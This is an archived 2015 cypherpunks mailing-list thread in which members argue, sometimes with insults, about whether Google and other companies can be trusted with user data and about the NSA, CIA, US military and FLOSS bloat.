We Education is always good. Don't infect others with pathological paranoia, but a healthy understanding of risks and exposures is always good. > highlighted some foundations (for profit being inherently Not inherently. Social, economic, legal, contractual, and other cultural systems allow, disallow, guide, and control people in their interactions. The US, for instance, has always been a place where there were many unwritten rules of operating in business. Some have run roughshod over those, sometimes reaping unjust rewards and/or changing what is acceptable, but there are always things that could be done that just aren't. Further, a particular entity could impose upon itself, by charter, culture, or customer agreement, a more stringent stance than others. There could be mechanisms that audit or otherwise control this. You get what you optimize for. If you have a default corporation controlled by weak, shallow leaders and driven by shallow, blind Wall Street numbers, then the result is likely to be sociopathic. On the other hand, however imperfectly or incompletely, certain companies have a founder-driven culture of a far more empathic nature than this default, whether they be different or have a stated desire to not be evil. Both of those companies largely care about users in some strong sense, much unlike certain other highly and chronically annoying entities. > sociopathic). We reminded the reader that their consent is often not > obtained (yes, we can argue about implied consent, the point is we're > edumacating). We make the assertion that companies actually abuse all > that data (whatever "abuse" might mean), just in case someone missed > the memo. One person's use is another person's abuse. People should be aware. > > With all this, we are also implying that this abuse is wrong. Abuse is wrong, use may not be. Sometimes depends on where you stand. Some types don't have agreement. 
Plenty of people hate the idea of automated ad filtering based on the content of email or chat or other activity. There are things that could go wrong with that if it gets to a human or is gamed, but properly done anonymously, it can be fine: I'd rather get timely ads I may care about than the much larger set of uninteresting dreck. I actually suggested doing exactly this with AOL chatrooms in about 1996. This is a good example of good education vs. bad education: If you say "This could be misused or leaked in a way that could be a problem if a company isn't careful, and here is a scenario..., and here is how that could be handled better..." that's fine, especially if a company can indicate the level of care & security they're currently employing. If you say: "Google is reading your email, sending it to every company that wants to buy it for a few cents!" that's disingenuous at best and dangerous to certain people's mental state at worst. > > Your version sounds like you are -trying- to normalise the wrong, > justify the bad, and 'accept the new messed up world order as best we > can'. We hear enough of that from others. And I saw NO to that abuse! > Give me justification for abuse, at your peril! I was mainly talking about making realistic decisions without a value statement for current practices, which we are all going to have different opinions on since they aren't public. We should have some taxonomy of the nature of those abuses, with consensus lines drawn as to what we all find acceptable or not acceptable, why, and what mechanisms best resolve the issue. > > >> although how they use it is somewhat bounded by privacy laws (however >> incomplete), not making private things public, unfair business >> practices, etc. My point was that the existence of large, valuable services >> that depend on a lot of trust is, or should be to a > "should be" trustworthy? Some are not at certain points, or all are not at some points, or only mine is as far as I know. 
Take your pick. > They're companies. You've missed the bloody memo. And a very bloody > memo the corporate record is, for decades and across industries! Have you noticed the difference in nature of various companies over time? > >> sane entity, an even stronger incentive to behave than the patchwork >> of laws. > You're not grokking the incentive. It's profit. And it's more than an > incentive, profit is the foundational company-constitutional > imperative for companies (funny that). > > This is why companies can NOT be trusted. You seem to be missing this > basic point. Do you own a company? Of course; it may not be worth anything, but I do actual work. You don't? You're not doing your taxes properly if not... ;-) Who CAN be trusted? At some level, no one, but we've already established that in the real world, you generally have to trust people all the time. Are you sure you are applying your distrust criteria in a comprehensive and rational way? >> Past oversharing, then embarrassment and public >> abuse, coupled with product impacts as they lose sensitive customers, has >> almost certainly caused a cleanup of those attitudes. I'd >> be interested in the actual policy right now, although I doubt they are >> going to be too explicit. I suspect that it also varies >> heavily by corporate culture. > Some companies start with good policy, and good public stance, most > significantly in this conversation, Google itself - "do no evil". They > don't say that any more. They can't. Did you ever wonder why they > stopped saying that? They pretty much still do. And it is silly to say they can't. They are a relatively giant company. Mistakes happen. What mistakes are they making now? https://www.google.com/about/company/philosophy/ You can make money without doing evil. > >> Every day, you are somewhat at the mercy of dozens and perhaps thousands >> of people who could cause you pain, suffering, or death if >> they were so inclined. 
There are many in the government, schools, employer >> personnel departments, medical and insurance companies, >> etc. The people driving around you, stopped at a light while you cross the >> street, making your food, they all have access and the >> ability to inflict misery on you. You have to trust someone to some extent. > Trust is a relevant foundation to community/ society, sure. > > But now you've segued into personal. Which is a good place at times, > an effective place. It's more tangible for people. > > But here we were talking about companies. I would ordinarily presume > your trust formula is different for companies that it is for actual, > you know, humans. > > I suggest not overloading corporate rights, corporate trust, with > human rights, human trust. Not particularly useful in our context. All companies that I know about are filled with people. They may be sheeple a little too often (I have permanently fired ATT Mobile (formerly Cingular) for refusing to issue a refund to my son when they screwed up "because the policy prevents us".), but it is personal at some level. You are trusting that the Comcast installer is not a murderer, that the banker isn't stealing from you, and that the well-paid Google engineer has better things to do than to eavesdrop on you. >> The question is who you trust, how incentivized they >> and the people / organization around them protects you, whether wrongs will >> be limited, corrected, and righted or not. > A rational approach is warranted for sure. > > Companies, and in most cases humans working for them, are > predominantly incentivized by money. Yesterday I read an article on Whether all are, or even a predominant amount are, is questionable. Many people care about customers, their career, mission, etc. Money is only an issue occasionally. > the Great Wall of China. Incredible vision, so many centuries of > building. 
But when it came down to the time it was 'needed', due to > there being only so many sentries, and so far spread out, and the > sentries paid so little, when the marauding Mongols wanted in, to do > some marauding, they just bribed a sentry or two. Apparently same with > the Europeans in more recent times. So, incentivized people were, > secure, wall was not. The biggest security theater. > > I think the great wall may have been useful psychologically though... > to encourage a mindset of unity in the people within. > > >> For a long time, as a contractor at the peak of their heyday, I had access >> to AOL's entire user database, complete with name, >> address, full credit card info, phone numbers, etc. I could have also >> snooped on their Buddylists, their person-to-person video >> (Instant Images), and a lot more. There was zero chance that I would abuse >> any of that. > Your ethics are admirable. I share your personal intentions. I don't > trust companies though, except to plunder markets to the maximum > profit possible. There are some who have acted that way, for sure. I have my black list. Others try. They deserve a little credit, and help when possible. > > Zenaan > >> sdw sdw >> >> On 7/20/15 2:07 PM, Juan wrote: >>> cypherpunk : >>> >>> https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html >>> >>> "Google and the NSA: Who’s holding the ‘shit-bag’ now?" >>> >>> >>> Not-cypherpunk-at-all : >>> >>> >>>> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >>>> >>>> I feel perfectly confident that Google is going to protect their >>>> billions in income and valuation by being very careful with >>>> avoiding abusing their data or users in any strong sense. -- Stephen D. 
Williams sdw at lig.net stephendwilliams at gmail.com LinkedIn: http://sdw.st/in V:650-450-UNIX (8649) V:866.SDW.UNIX V:703.371.9362 F:703.995.0407 AIM:sdw Skype:StephenDWilliams Yahoo:sdwlignet Resume: http://sdw.st/gres Personal: http://sdw.st facebook.com/sdwlig twitter.com/scienteer From sdw at lig.net Mon Jul 20 21:36:57 2015 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 20 Jul 2015 21:36:57 -0700 Subject: an ominous comment In-Reply-To: <55adc555.0ae88c0a.425f.3132@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> Message-ID: <55ADCC69.1060207@lig.net> On 7/20/15 9:07 PM, Juan wrote: > > Hey. *Now* I get it. > > This mailing list has a lot of tor-tards who are apologists of > the pentagon's propaganda and spying efforts. Are you saying that the Pentagon is never good or useful? Nor are any of their spying efforts? > > It has people who say that the NSA does good things (coderman) They don't? > > It has apologists of the US marines. You have never benefited in any way from the US marines? The footprint there is pretty large. You think they are somehow fundamentally evil when they don't determine their goals or rules of engagement? Their job is to be a bad ass tool, the proverbial big stick. It is someone else's job to decide how to use that tool. Marines don't kill people, politicians using Marines kill people. Err, something like that. > > It has high ranking scumbags from the CIA. There are high ranking scumbags from the CIA here? Interesting. Is everyone from the CIA scumbags by definition?
> It has commie 'anarchists' who are offended by (and would love > to silence) people who badmouth the marines' apologists. Eh? > > And NOW it also has a google and cloud apologist. Welcome > Stephen =) You are yet another reason to distrust the FLOSS movement and > its bloatware. FLOSS has bloatware? Are you using the same meaning as the rest of us? What's your favorite alternative? Someone explaining bits of the world are not necessarily an apologist for those bits. Trying to correct or moderate viewpoint extremism (see what I did there?) with more balance, or logic, or other viewpoints isn't necessarily being an apologist either; that's the kind of accusation that usually comes from someone slinging not fully supported barbs. I do think Google is better than some other companies, but that's pretty weak on the apologist scale; I was more making a statement about a class of companies and how they should rationally act with respect to security. > J. > What's your alternative to all of these things? If you really are into security in any sense, you should be able to explain what security exposures moderating or eliminating those entities would cause and what you would advocate to replace them. I'm offended in various ways by a lot of what happened in the past, often in organizations like DOJ, FBI, etc. that should have known better. I would even say that a lot of government employees and contractors seem to have got away with a lot of things they shouldn't have. But that doesn't mean that any of those organizations are fundamentally evil and aren't almost completely staffed by intelligent, respectable people. Anyway, if you're still in the rebelling against authority stage, fine, have fun. Good luck with that. In the US, government wise, the people are the authority, their own authority in essence, it just may take a long time for that to play out in a given area. In some ways, this is also true for companies, with some nuance. 
sdw From shelley at misanthropia.org Mon Jul 20 23:08:56 2015 From: shelley at misanthropia.org (Shelley) Date: Mon, 20 Jul 2015 23:08:56 -0700 Subject: an ominous comment In-Reply-To: <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> Message-ID: <20150721060840.679F7C0001C@frontend1.nyi.internal> On July 20, 2015 2:17:54 PM Juan wrote: > > cypherpunk : > > https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html > > "Google and the NSA: Who’s holding the ‘shit-bag’ now?" > > > Not-cypherpunk-at-all : > > > > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > > > > I feel perfectly confident that Google is going to protect their > > billions in income and valuation by being very careful with > > avoiding abusing their data or users in any strong sense. > Yes Juan, thank you for posting this link! This isn't even new, we just got proof in that Stratfor email dump. Anyone who can read that and want to have anything to do with google in any capacity is insane. Read the whole linked conversation, if you haven't. It's quite disturbing and enlightening. This is a good link to send around to the sHillary bots, too. Not that it'll make a difference. It's Giant Douche and Turd Sandwich all over again, and if voting really changed anything they'd make it illegal.
-S From zen at freedbms.net Mon Jul 20 16:56:30 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Mon, 20 Jul 2015 23:56:30 +0000 Subject: an ominous comment In-Reply-To: <55AD6DF7.50903@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> Message-ID: On 7/20/15, Stephen D. Williams wrote: > On the other hand, life is a balance. True. I'm thinking individuals here. > I probably shouldn't have tried to > make the point here, but it is something a security > professional should understand well: The right amount of security > should be moderated by the tradeoff of costs vs. overhead vs. > maximizing benefit vs. minimizing loss. Corporations are bound to their economic imperative to make such trade offs. This is the heart of their sociopathic nature. This is the part of corporations/ companies which needs, somehow, to change in order to get this world on a better track. ... > It is terrible that some companies have been too eager to share information. > They may or may not have believed whatever safeguards > were in place, or not cared, etc. I'm sure a high pressure meeting with an > FBI crew who are strongly playing the terrorism angle is > persuasive, as it should be, up to a point. Here's the kind of talk that looks like a hole freshly dug. Perhaps if there is an actual existential threat to someone's life or some building (let's please stop using the T word), then "high pressure persuasion" would be adequate for a court order anyway. As it should be - up to the point of a subpoena, summons and/ or order to perform or act - to handle the actual problem. You seem though to be normalising behaviours and approaches and "high pressure persuasion" tactics by government departments, in a generalised way. 
You might not be intending the things you imply/ say, but don't be surprised when such positions are mocked or ridiculed. Don't take such blow back as personal at all though - it's the "normalisation of bad" and "plainly wrong/ evil" which is being attacked for the bullshit it is. > And companies holding your data > can actually look at that data for business purposes, Perhaps try something this instead: "And for-profit therefore sociopathic-by-nature companies do massively collect your metadata AND your personal information, with or without your consent, and are well leaked and reported to use and abuse all your data both within and beyond the law, beyond your expectations, and beyond what many people consider ethical." See what we did there? We made it personal, giving a slight hope to the uninitiated to realise something they did not realise before. We highlighted some foundations (for profit being inherently sociopathic). We reminded the reader that their consent is often not obtained (yes, we can argue about implied consent, the point is we're edumacating). We make the assertion that companies actually abuse all that data (whatever "abuse" might mean), just in case someone missed the memo. With all this, we are also implying that this abuse is wrong. Your version sounds like you are -trying- to normalise the wrong, justify the bad, and 'accept the new messed up world order as best we can'. We hear enough of that from others. And I saw NO to that abuse! Give me justification for abuse, at your peril! > although how they use it is somewhat bounded by privacy laws (however > incomplete), not making private things public, unfair business > practices, etc. My point was that the existence of large, valuable services > that depend on a lot of trust is, or should be to a "should be" trustworthy? They're companies. You've missed the bloody memo. And a very bloody memo the corporate record is, for decades and across industries! 
> sane entity, an even stronger incentive to behave than the patchwork > of laws. You're not grokking the incentive. It's profit. And it's more than an incentive, profit is the foundational company-constitutional imperative for companies (funny that). This is why companies can NOT be trusted. You seem to be missing this basic point. Do you own a company? > Past oversharing, then embarrassment and public > abuse, coupled with product impacts as they lose sensitive customers, has > almost certainly caused a cleanup of those attitudes. I'd > be interested in the actual policy right now, although I doubt they are > going to be too explicit. I suspect that it also varies > heavily by corporate culture. Some companies start with good policy, and good public stance, most significantly in this conversation, Google itself - "do no evil". They don't say that any more. They can't. Did you ever wonder why they stopped saying that? > Every day, you are somewhat at the mercy of dozens and perhaps thousands > of people who could cause you pain, suffering, or death if > they were so inclined. There are many in the government, schools, employer > personnel departments, medical and insurance companies, > etc. The people driving around you, stopped at a light while you cross the > street, making your food, they all have access and the > ability to inflict misery on you. You have to trust someone to some extent. Trust is a relevant foundation to community/ society, sure. But now you've segued into personal. Which is a good place at times, an effective place. It's more tangible for people. But here we were talking about companies. I would ordinarily presume your trust formula is different for companies that it is for actual, you know, humans. I suggest not overloading corporate rights, corporate trust, with human rights, human trust. Not particularly useful in our context. 
> The question is who you trust, how incentivized they > and the people / organization around them protects you, whether wrongs will > be limited, corrected, and righted or not. A rational approach is warranted for sure. Companies, and in most cases humans working for them, are predominantly incentivized by money. Yesterday I read an article on the Great Wall of China. Incredible vision, so many centuries of building. But when it came down to the time it was 'needed', due to there being only so many sentries, and so far spread out, and the sentries paid so little, when the marauding Mongols wanted in, to do some marauding, they just bribed a sentry or two. Apparently same with the Europeans in more recent times. So, incentivized people were, secure, wall was not. The biggest security theater. I think the great wall may have been useful psychologically though... to encourage a mindset of unity in the people within. > For a long time, as a contractor at the peak of their heyday, I had access > to AOL's entire user database, complete with name, > address, full credit card info, phone numbers, etc. I could have also > snooped on their Buddylists, their person-to-person video > (Instant Images), and a lot more. There was zero chance that I would abuse > any of that. Your ethics are admirable. I share your personal intentions. I don't trust companies though, except to plunder markets to the maximum profit possible. Zenaan > sdw > > On 7/20/15 2:07 PM, Juan wrote: >> >> cypherpunk : >> >> https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html >> >> "Google and the NSA: Who’s holding the ‘shit-bag’ now?" >> >> >> Not-cypherpunk-at-all : >> >> >>> 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : >>> >>> I feel perfectly confident that Google is going to protect their >>> billions in income and valuation by being very careful with >>> avoiding abusing their data or users in any strong sense. From sdw at lig.net Tue Jul 21 00:15:16 2015 From: sdw at lig.net (Stephen D. 
Williams) Date: Tue, 21 Jul 2015 00:15:16 -0700 Subject: an ominous comment In-Reply-To: <55add913.121c8d0a.89df3.1748@mx.google.com> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> <55add913.121c8d0a.89df3.1748@mx.google.com> Message-ID: <55ADF184.9070004@lig.net> On 7/20/15 10:32 PM, Juan wrote: > On Mon, 20 Jul 2015 21:36:57 -0700 > "Stephen D. Williams" wrote: > >> On 7/20/15 9:07 PM, Juan wrote: >>> Hey. *Now* I get it. >>> >>> This mailing list has a lot of tor-tards who are apologists >>> of the pentagon's propaganda and spying efforts. >> Are you saying that the Pentagon is never good or useful? Nor are >> any of their spying efforts? > Are you saying the pentagon is good and useful? The Pentagon et al are protecting a large portion of the world from being overrun. Nobody else will do it. >> ... >> when they don't determine their goals or rules of >> engagement? Their job is to be a bad ass tool, the proverbial big >> stick. It is someone else's job to decide how to use that tool. >> Marines don't kill people, politicians using Marines kill people. >> Err, something like that. > > Marines and other 'military personnel' murder people when > 'ordered' to. They are the worst scumbags on earth. > > Politicians are morally responsible. The military are morally > and materially responsible. Are police always bad too? > ... > Is everyone from the CIA scumbags by definition? > Yes. Whatever you gotta believe. Most of their job is to understand the world, publishing both a nice public database and the presidential daily brief (today's news). 
And to consult with the President as need so that hopefully reasonably intelligent decisions are made, but that depends on the intelligence of the current president. >> ... > > ... >>> J. >>> >> What's your alternative to all of these things? If you really are >> into security in any sense, you should be able to explain what >> security exposures moderating or eliminating those entities would >> cause and what you would advocate to replace them. > > Are you talking about the US military? And FBI, CIA, State, Google, etc. > > > >> I'm offended in various ways by a lot of what happened in the past, >> often in organizations like DOJ, FBI, etc. that should have known >> better. > Should they? Looks like you don't know what government is. Wha? > > > >> I would even say that a lot of government employees and >> contractors seem to have got away with a lot of things they shouldn't >> have. But that doesn't mean that any of those organizations are >> fundamentally evil and aren't almost completely staffed by >> intelligent, respectable people. > > LOL. So, how much trolling should I let you get away with? > > Worthless murdering scumbags are 'respectable' people and not > 'fundamentally evil'. Sure. Maybe they are 'accidentally' > evil? DOJ, Treasury, State, HHS, etc. are filled with worthless murdering scumbags? There are certain people, Marines et al, who are trained to be very lethal. Sucks to need that, but being anything less than the strongest & baddest isn't an option for the US. They are concentrated, supposed to be carefully deployed and directed. Create people like that from the subset of people who want to be like that and a few are going to go off the rails occasionally. That's a bummer, and needs to be constantly protected against, but there's no obvious alternative. The US is the least imperialist top superpower that ever existed. Still not perfect, but better than all the rest. 
> How about they 'accidentally' beat you to a pulp and then feed > you to the pigs? Just as an innocent mistake of course... Oh kay. Are you off your meds? >> Anyway, if you're still in the rebelling against authority stage, >> fine, have fun. Good luck with that. In the US, government wise, >> the people are the authority > Really? That's an interesting concept. How many lsd doses do > you need in order to reach the parallel universe where that > is reality? Because in this universe, it isn't. You haven't been watching long or closely enough. Things have changed a lot in the US in my lifetime, and it's only speeding up. >> , their own authority in essence, it just >> may take a long time for that to play out in a given area. > Sure. That's how jesus planned it all. Nonsense again. > >> In some >> ways, this is also true for companies, with some nuance. >> >> sdw >> sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7248 bytes Desc: not available URL: From sdw at lig.net Tue Jul 21 00:29:20 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 00:29:20 -0700 Subject: an ominous comment In-Reply-To: <20150721060840.679F7C0001C@frontend1.nyi.internal> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <20150721060840.679F7C0001C@frontend1.nyi.internal> Message-ID: <55ADF4D0.2040402@lig.net> On 7/20/15 11:08 PM, Shelley wrote: > On July 20, 2015 2:17:54 PM Juan wrote: > >> >> cypherpunk : >> >> https://www.wikileaks.org/Op-ed-Google-and-the-NSA-Who-s.html >> >> "Google and the NSA: Who’s holding the ‘shit-bag’ now?" >> >> >> Not-cypherpunk-at-all : >> >> >> > 2015-07-19 2:22 GMT+09:00 Stephen D. 
Williams : >> > >> > I feel perfectly confident that Google is going to protect their >> > billions in income and valuation by being very careful with >> > avoiding abusing their data or users in any strong sense. >> > > > Yes Juan, thank you for posting this link! This isn't even new, we just got proof in that Stratfor email dump. Anyone who can > read that and want to have anything to do with google in any capacity is insane. Read the whole linked conversation, if you > haven't. It's quite disturbing and enlightening. > > This is a good link to send around to the sHillary bots, too. Not that it'll make a difference. It's Giant Douche and Turd > Sandwich all over again, and if voting really changed anything they'd make it illegal. Just for fun, I reread this. Based just on the text of this page, there is little that is really a gotcha of any significance. A bunch of well-placed, powerful people know each other, bla bla. Google Ideas is trying to spread access to the Internet far and wide and, like any US citizen or company should, consults with the State department when doing anything with a non-first-world-country. The CIA might also want Internet access far and wide in those countries, perhaps for fairly great reasons: general education, anti-propaganda, etc. A modern, educated, liberal technologist wants to counteract extremism with education in any way feasible, oh my. The government is paying for services they are using? Is that unusual? Where is there something that is actually illegal, regressive, or otherwise actually a problem? Plenty of innuendo and situations that could potentially be bad, but where's the meat? I like Wikileaks at all overall. Very entertaining, and some people should stay organized while heavily scrutinizing those in power to detect and expose abuse, or even the appearance of abuse. But I'm not confused by this kind of innuendo and imprecise characterizations. Be specific and clear about what exactly was wrong. 
What was the specific harm? What should people have done instead? > > -S > sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3798 bytes Desc: not available URL: From juan.g71 at gmail.com Mon Jul 20 21:07:55 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 01:07:55 -0300 Subject: an ominous comment In-Reply-To: <55AD8704.8070104@pilobilus.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> Message-ID: <55adc555.0ae88c0a.425f.3132@mx.google.com> Hey. *Now* I get it. This mailing list has a lot of tor-tards who are apologists of the pentagon's propaganda and spying efforts. It has people who say that the NSA does good things (coderman) It has apologists of the US marines. It has high ranking scumbags from the CIA. It has commie 'anarchists' who are offended by (and would love to silence) people who badmouth the marines' apologists. And NOW it also has a google and cloud apologist. Welcome Stephen =) You are yet another reason to distrust the FLOSS movement and its bloatware. J. From sdw at lig.net Tue Jul 21 01:42:52 2015 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 21 Jul 2015 01:42:52 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: <55AE060C.9050201@lig.net> On 7/21/15 1:23 AM, Zenaan Harkness wrote: > On 7/21/15, Stephen D. 
Williams wrote: >> On 7/20/15 9:07 PM, Juan wrote: >>> And NOW it also has a google and cloud apologist. Welcome >>> Stephen =) You are yet another reason to distrust the FLOSS movement and >>> its bloatware. >> FLOSS has bloatware? > Nah - firefox is a lithe little vegetarian pea pod, lucky to use 1% of > one CPU and a bee's proverbial of your RAM, LibreOffice is so small > and feature free it's lucky to even print a document, and the Linux > kernel, well, it's so clean, small and well documented it's just a few > lines longer than HelloWorld.c - so of course it's well audited and > highly secure as a result. Couldn't ask for cleaner security really. > > Nope, no bloatware round these parts. Someone missed the memo... Polymer 1.0 web app, which is the cleanest HTML / Javascript yet, talking via Swagger IO library to a Go single-executable Docker container (break out of that!) with a very simple matching webAPI app structure... That was some work to find, validate, and select; you're welcome. I love how Microsoft is happy that their mini Windows VM is "only" 400MB to start. Web browsers are the new operating system, so I cut Firefox some slack. Most of what you interact with in the browser API is a Javascript web app anyway. I often have up to 700 tabs open... It is the Javascript on those tabs that makes it a pig. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2166 bytes Desc: not available URL: From grarpamp at gmail.com Mon Jul 20 23:01:10 2015 From: grarpamp at gmail.com (grarpamp) Date: Tue, 21 Jul 2015 02:01:10 -0400 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> Message-ID: On Mon, Jul 20, 2015 at 2:35 AM, coderman wrote: > i am currently collecting an image corpus... so i can automate the > report. yeah, that's it. 
;) See it's working, these honeypots have drawn you in, directing your activities, got you writing scripts, downloading stuffs, exposing yourself to, ahem. timing attacks and 0days. Face it, ur 0wn3d. https://twitter.com/PeytonKanee97/status/621249703775223809 Aww, they're just checkin out your tweets, honestly... From juan.g71 at gmail.com Mon Jul 20 22:32:09 2015 From: juan.g71 at gmail.com (Juan) Date: Tue, 21 Jul 2015 02:32:09 -0300 Subject: an ominous comment In-Reply-To: <55ADCC69.1060207@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> Message-ID: <55add913.121c8d0a.89df3.1748@mx.google.com> On Mon, 20 Jul 2015 21:36:57 -0700 "Stephen D. Williams" wrote: > On 7/20/15 9:07 PM, Juan wrote: > > > > Hey. *Now* I get it. > > > > This mailing list has a lot of tor-tards who are apologists > > of the pentagon's propaganda and spying efforts. > > Are you saying that the Pentagon is never good or useful? Nor are > any of their spying efforts? Are you saying the pentagon is good and useful? > > > > > It has people who say that the NSA does good things > > (coderman) > > They don't? Do you have to ask? > > > > > It has apologists of the US marines. > > You have never benefited in any way from the US marines? No. But granted, at least I haven't been directly harmed by them. Which is something not everyobdy can say. > The > footprint there is pretty large. You think they are somehow > fundamentally evil I don't just 'think' it. It's reality. > when they don't determine their goals or rules of > engagement? Their job is to be a bad ass tool, the proverbial big > stick. It is someone else's job to decide how to use that tool. 
> Marines don't kill people, politicians using Marines kill people. > Err, something like that. Marines and other 'military personnel' murder people when 'ordered' to. They are the worst scumbags on earth. Politicians are morally responsible. The military are morally and materially responsible. > > > > > It has high ranking scumbags from the CIA. > > There are high ranking scumbags from the CIA here? Yes. > Interesting. Sort of. > Is everyone from the CIA scumbags by definition? Yes. > > > It has commie 'anarchists' who are offended by (and would > > love to silence) people who badmouth the marines' apologists. > > Eh? Ask a retard called Nick Econopouly if you want details. > > > > > And NOW it also has a google and cloud apologist. Welcome > > Stephen =) You are yet another reason to distrust the FLOSS > > movement and its bloatware. > > FLOSS has bloatware? http://www.theregister.co.uk/2009/09/22/linus_torvalds_linux_bloated_huge/ good enough of an 'authority'? > Are you using the same meaning as the rest of > us? What's your favorite alternative? There isn't any real alternative. And sure, floss is less bloated than other commercial crap, but still. > > Someone explaining bits of the world are not necessarily an apologist > for those bits. Trying to correct or moderate viewpoint extremism > (see what I did there?) Yes, you tried to dismiss something that doesn't line up with typical establishment bullshit as 'extremism' - I, of course, am hardly impressed... > with more balance, or logic, or other > viewpoints isn't necessarily being an apologist either; that's the > kind of accusation that usually comes from someone slinging not fully > supported barbs. I do think Google is better than some other > companies, but that's pretty weak on the apologist scale; I was more > making a statement about a class of companies and how they should > rationally act with respect to security. Sure. Your comments about google & the cloud are not propaganda. I'm selling a bridge. 
Interested? > > > J. > > > What's your alternative to all of these things? If you really are > into security in any sense, you should be able to explain what > security exposures moderating or eliminating those entities would > cause and what you would advocate to replace them. Are you talking about the US military? > > I'm offended in various ways by a lot of what happened in the past, > often in organizations like DOJ, FBI, etc. that should have known > better. Should they? Looks like you don't know what government is. >I would even say that a lot of government employees and > contractors seem to have got away with a lot of things they shouldn't > have. But that doesn't mean that any of those organizations are > fundamentally evil and aren't almost completely staffed by > intelligent, respectable people. LOL. So, how much trolling should I let you get away with? Worthless murdering scumbags are 'respectable' people and not 'fundamentally evil'. Sure. Maybe they are 'accidentally' evil? How about they 'accidentally' beat you to a pulp and then feed you to the pigs? Just as an innocent mistake of course... > > Anyway, if you're still in the rebelling against authority stage, > fine, have fun. Good luck with that. In the US, government wise, > the people are the authority Really? That's an interesting concept. How many lsd doses do you need in order to reach the parallel universe where that is reality? Because in this universe, it isn't. >, their own authority in essence, it just > may take a long time for that to play out in a given area. Sure. That's how jesus planned it all. > In some > ways, this is also true for companies, with some nuance. 
> > sdw > From seanl at literati.org Mon Jul 20 21:03:32 2015 From: seanl at literati.org (Sean Lynch) Date: Tue, 21 Jul 2015 04:03:32 +0000 Subject: In-Reply-To: References: <55AC5B26.8050100@pobox.com> <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> Message-ID: On Sun, Jul 19, 2015 at 11:42 PM coderman wrote: > On 7/19/15, Alfie John wrote: > > ... > > They are mostly astroturfers, pinging every so often. Click report and > > move on. > > i am currently collecting an image corpus... so i can automate the > report. yeah, that's it. ;) > Tumblr is a much better place to build image corpuses. And then you get to pick from whom you get images rather than letting the spambots pick for you. Of the accounts you listed, only https://twitter.com/PazhetnykhMiss https://twitter.com/helensmithusacc https://twitter.com/PeytonKanee97 are still active. From admin at pilobilus.net Tue Jul 21 02:28:34 2015 From: admin at pilobilus.net (Steve Kinney) Date: Tue, 21 Jul 2015 05:28:34 -0400 Subject: an ominous comment In-Reply-To: <55ADF184.9070004@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> <55ad62b8.8915370a.20276.ffffa5a6@mx.google.com> <55AD6DF7.50903@lig.net> <55AD8704.8070104@pilobilus.net> <55adc555.0ae88c0a.425f.3132@mx.google.com> <55ADCC69.1060207@lig.net> 